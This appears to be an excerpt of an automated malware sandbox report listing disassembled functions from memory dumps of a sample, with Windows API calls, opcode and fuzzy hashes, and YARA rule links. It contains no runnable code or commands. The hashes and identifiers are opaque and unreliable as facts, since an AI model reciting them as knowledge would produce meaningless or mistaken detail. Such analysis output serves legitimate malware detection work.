                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 21ac66eeae07a20b8165979336b6224ff0819e9977595c21b5b8821623f8a987
                                                                                            • Instruction ID: ea1bb8d4dd840777ff61a4975a316564cb3aad7686879e47615330cd9bde2d2b
                                                                                            • Opcode Fuzzy Hash: 21ac66eeae07a20b8165979336b6224ff0819e9977595c21b5b8821623f8a987
                                                                                            • Instruction Fuzzy Hash: AAA15638A45358CFCB65DF60C88869DBBB2BF49346F6081E9D50AA2740DB358EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A77B4 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 27be126b822d8b78ebb4c26cf7b819785df02ccc508b983b3ec5dd5e14eff702
                                                                                            • Instruction ID: 50a1d2504e153fa58bf3b5d36dd90093a844620f6d4448a5d2701e3e8a052315
                                                                                            • Opcode Fuzzy Hash: 27be126b822d8b78ebb4c26cf7b819785df02ccc508b983b3ec5dd5e14eff702
                                                                                            • Instruction Fuzzy Hash: A5A16838A45358CFCB65DF60D88869DBBB2BF45346F2081E9D50AA2740DB358EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060A77F9 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 060A7820
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: afb1d5cfa0f03cb45d7bec7eb9543ddada81606dd902051c42c932535704c093
                                                                                            • Instruction ID: fee80cc847fefc8d2009bfab18fbb423a954c24eea18ddf6ce4337952b7fdb9f
                                                                                            • Opcode Fuzzy Hash: afb1d5cfa0f03cb45d7bec7eb9543ddada81606dd902051c42c932535704c093
                                                                                            • Instruction Fuzzy Hash: 31916838A45368CFCB65DF60C88869DBBB2BF45346F2081E9D50AA2740DB358EC5CF61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02DBCFE4 Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.527139754.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2db0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 4f53ac0ba293e0784f6bcc031bb38d56fa9cf1f4f8581bb773a8573c74016b60
                                                                                            • Instruction ID: bc1fa6149bfc8d1bef38c3caff939c19cd1eafbe765decbd72e0f1da0acf68ce
                                                                                            • Opcode Fuzzy Hash: 4f53ac0ba293e0784f6bcc031bb38d56fa9cf1f4f8581bb773a8573c74016b60
                                                                                            • Instruction Fuzzy Hash: 424156B0D00249DFDB11CFA9D8557DEBBF2AF08314F24852AE856AB340D7749846CFA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060AF628 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 060AF6E9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallProcWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2714655100-0
                                                                                            • Opcode ID: 8f2ebb4d0ec11f2c1a70455febed6a7218a43359c17742c56927d98f18d4d173
                                                                                            • Instruction ID: 3c704cae01414f0c05a68dcd0367c2903424c5652bb16923ce6f3ed806d4251c
                                                                                            • Opcode Fuzzy Hash: 8f2ebb4d0ec11f2c1a70455febed6a7218a43359c17742c56927d98f18d4d173
                                                                                            • Instruction Fuzzy Hash: DF4147B4A003468FDB54CF99C888AAEBBF5FF88314F248459D519AB321D774A841CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02DB9E1C Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.527139754.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2db0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: c25f9b7df8a072d91cabcc28fd2f426fc58f1cd421a0b30e349ea8c97f03dd3e
                                                                                            • Instruction ID: a50173a423bf53c6e006ad40850b43397c3e5ccf2fa67902e6cbb36181dd3c29
                                                                                            • Opcode Fuzzy Hash: c25f9b7df8a072d91cabcc28fd2f426fc58f1cd421a0b30e349ea8c97f03dd3e
                                                                                            • Instruction Fuzzy Hash: D73134B0D00249CFDB15CFA9D8557DEBBB2AF08314F20812AE816AB384D7759846CF92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02DB4CD8 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02DB4D62
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.527139754.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2db0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: EncodePointer
                                                                                            • String ID:
                                                                                            • API String ID: 2118026453-0
                                                                                            • Opcode ID: 9c640ab5fdf9f6d123926c9acc0bdc97400cc9bca12c706d77f27b1336a156ca
                                                                                            • Instruction ID: e051cc6347464ef082ad0d6afc4f8acab0e706eeae07afccfa8517c8311b3353
                                                                                            • Opcode Fuzzy Hash: 9c640ab5fdf9f6d123926c9acc0bdc97400cc9bca12c706d77f27b1336a156ca
                                                                                            • Instruction Fuzzy Hash: C12163B19412088BCB20DFA9D8587DABBF4FB08314F24886AD646A7305D3389906CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02DB4CE8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02DB4D62
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.527139754.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2db0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: EncodePointer
                                                                                            • String ID:
                                                                                            • API String ID: 2118026453-0
                                                                                            • Opcode ID: e9924289e77d25993b2388415cf9242bba988d9ee97540fa40df602c519decef
                                                                                            • Instruction ID: 9226e8f7c529a1915ee4db08d91253d4f07187d69f85e8e90a465c1808ceb5bd
                                                                                            • Opcode Fuzzy Hash: e9924289e77d25993b2388415cf9242bba988d9ee97540fa40df602c519decef
                                                                                            • Instruction Fuzzy Hash: 581183B09413088FCB20CFA9D4187DEBBF4EB48314F20882AD505A7704D738A946CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060AF9E3 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL ref: 060AFA47
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 7bfb6a84effc461cf7f4d2380255e4212b078c5600ed24854a909bf97eadd8a8
                                                                                            • Instruction ID: 04cb238f7411f4dc8860103846092b02893195cea8caa0f1583449360ac866dc
                                                                                            • Opcode Fuzzy Hash: 7bfb6a84effc461cf7f4d2380255e4212b078c5600ed24854a909bf97eadd8a8
                                                                                            • Instruction Fuzzy Hash: 431125B19003498FCB20CFAAD844BDEFFF4EB48324F10841AD569A7200C774A944CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 060AF9E8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL ref: 060AFA47
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.529849907.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_60a0000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 3df2e3d3a523ce1ab166ec8d41960dea1929b9ac320ee2ecb1daba7a689cf879
                                                                                            • Instruction ID: 7f85230611421d4ed405609746323a9a7cc43a320aa53fd4277998a1b7e0c973
                                                                                            • Opcode Fuzzy Hash: 3df2e3d3a523ce1ab166ec8d41960dea1929b9ac320ee2ecb1daba7a689cf879
                                                                                            • Instruction Fuzzy Hash: 1B1103B19003498FCB20CFAAD444BDEFBF4AB48364F14841AD529B7300C775A944CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02CCD4D8 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.526699085.0000000002CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CCD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2ccd000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 358165f20a561aed7b7361227e1090d878a08489c03ba3fe07e7af3cf1384909
                                                                                            • Instruction ID: 844f61c2d64cd5e54d3d56b99628cf38931fe508abc4696751c6dc04e127a79f
                                                                                            • Opcode Fuzzy Hash: 358165f20a561aed7b7361227e1090d878a08489c03ba3fe07e7af3cf1384909
                                                                                            • Instruction Fuzzy Hash: 2C2125B1504244DFDB05CF14D9C0B2ABF65FB88328F34857DE9064B24AC336D956CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02CCD124 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.526699085.0000000002CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CCD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2ccd000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6406b66fc9b7f3b213af935ef2a69fd7cfc2fb6739c9738fa9aea8aee6f33607
                                                                                            • Instruction ID: 5f181492174c4842719115c97b3658bfe571a4bf9ecba4df815a65d6714a00ed
                                                                                            • Opcode Fuzzy Hash: 6406b66fc9b7f3b213af935ef2a69fd7cfc2fb6739c9738fa9aea8aee6f33607
                                                                                            • Instruction Fuzzy Hash: EF21F1B1504244DFDB01DF10D8C0B2ABB65FB88224F2486BDE9064A34AC336D856C6A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02CDE3F0 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.526773769.0000000002CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CDD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2cdd000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b74e5f04c153d8ab529c1a2cd50e9c2b833e2406570718f4fc4659ab664686d1
                                                                                            • Instruction ID: b3d2500002b5dabdb150edcbf1e2e71e443ad7a15b016229ee6e347ad24c38c9
                                                                                            • Opcode Fuzzy Hash: b74e5f04c153d8ab529c1a2cd50e9c2b833e2406570718f4fc4659ab664686d1
                                                                                            • Instruction Fuzzy Hash: 1C212971604244DFDB14DF50D9C4B26BB65FB88318F24C96DEA494F346C336E846CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02CCD4D3 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.526699085.0000000002CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CCD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2ccd000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
                                                                                            • Instruction ID: 83befa0dcf574f1700ca1fb115a9994b35c931211cf14f810c9e75b32f73ec64
                                                                                            • Opcode Fuzzy Hash: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
                                                                                            • Instruction Fuzzy Hash: 0911B1B6504280DFCB11CF10D9C4B16BF71FB84324F2486ADD80A4B656C33AD55ACBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02CCD11F Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.526699085.0000000002CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CCD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2ccd000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
                                                                                            • Instruction ID: 05474702d17b3ffd97409d434c2ff4e7cf24ce6b9117a2cfa1b841645a19d277
                                                                                            • Opcode Fuzzy Hash: ae8faed18134251be7da795e85ade6b132c84643db4099356389b19b4f3572d3
                                                                                            • Instruction Fuzzy Hash: 1A11BE76904284CFCB12CF10D9C4B56BF71FB88324F28C6ADD8054B65AC33AD55ACBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02CDE3EB Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000F.00000002.526773769.0000000002CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CDD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_15_2_2cdd000_SecuriteInfo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
                                                                                            • Instruction ID: a098f810e32e118fde1cc284c1beb83c8ec36c4bd7fbbffc4ecb498258d68d26
                                                                                            • Opcode Fuzzy Hash: c02608ae7fdd6dbde4dc06ae057c33988074160e7ca121dc10ae75c1f0855aa5
                                                                                            • Instruction Fuzzy Hash: 5511BB75504284DFCB11CF50D9C4B15BFA1FB88328F28C6AED9494B696C33AE44ACB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%